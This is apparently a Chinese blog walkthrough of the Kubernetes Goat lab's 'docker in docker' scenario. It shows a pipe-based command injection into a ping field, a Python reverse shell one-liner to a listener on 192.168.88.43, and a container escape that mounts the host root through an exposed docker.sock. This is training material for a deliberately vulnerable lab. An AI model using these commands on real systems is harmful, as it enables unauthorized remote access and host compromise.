Kubernetes Goat 02 - docker in docker
categories: []
date: '2023-10-27T17:15:58.474914+08:00'
tags:
- Kubernetes Goat
title: Kubernetes Goat 02 - docker in docker
updated: 2023-10-27T17:15:58.276+8:0
Kubernetes Goat 02 - docker in docker
- 能执行
ping命令
- 职业习惯加个管道符
反弹shell
- 尝试使用
bash来反弹没有成功 - 使用
python反弹执行成功
- 监听
- 执行命令
192.168.88.43 | python -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.88.43",6666));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'
判断环境
ls -la
mount
docker in docker
- "Docker in Docker" (DinD) 是一种在 Docker 容器内部运行 Docker 的实践方法。它允许您在一个容器中运行和管理 Docker 容器,而无需在宿主机上安装 Docker。
docker in docker 渗透测试
- 下载docker二进制版本
- 到
tmp目录下
wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -O /tmp/docker-19.03.9.tgz
- 解压后执行
- 可以执行
docker的命令
/tmp/docker/docker -H unix:///custom/docker/docker.sock images
/tmp/docker# /tmp/docker/docker -H unix:///custom/docker/docker.sock ps
宿主机执行系统命令
/tmp/docker/docker -H unix:///custom/docker/docker.sock run -v /:/mnt -it alpine sh
- 这个命令将在基于Alpine Linux镜像的Docker容器中运行。-v标志用于将主机目录/挂载到容器的目录/mnt。-it标志允许在容器内进行交互式会话,sh指定要运行的命令(在这种情况下,启动shell)。
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 putdown.top
